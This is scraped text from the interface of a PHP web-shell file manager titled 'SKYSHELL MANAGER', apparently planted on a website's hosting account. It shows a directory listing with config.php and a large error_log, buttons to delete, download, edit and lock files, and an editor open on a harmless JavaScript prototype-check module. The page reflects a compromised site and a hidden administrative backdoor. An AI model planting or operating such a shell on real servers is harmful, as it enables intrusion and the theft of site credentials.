📁
SKYSHELL MANAGER-
🛒
PHP v7.4.33
Create Folder
Create File
Current Path:
home
/
oshofree
/
public_html
/
chbluxuries.com
/
chb_data
/
Name
Size
Permissions
Actions
📁
..
-
0755
🗑️
🔒
📄
config.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
📄
error_log
22567.74 KB
0644
🗑️
⬇️
✏️
🔒
Editing: accessor.js
'use strict'; var result = require('./')(); var test = { __proto__: null, foo: {} }; /** @type {import('./accessor')} */ module.exports = function hasAccessor() { /* eslint no-proto: 0 */ return result && !('toString' in test) // eslint-disable-next-line no-extra-parens && /** @type {{ __proto__?: typeof Object.prototype }} */ ({}).__proto__ === Object.prototype // eslint-disable-next-line no-extra-parens && /** @type {ReadonlyArray<never> & { __proto__?: typeof Array.prototype }} */ ( []).__proto__ === Array.prototype; };
💾 Save Changes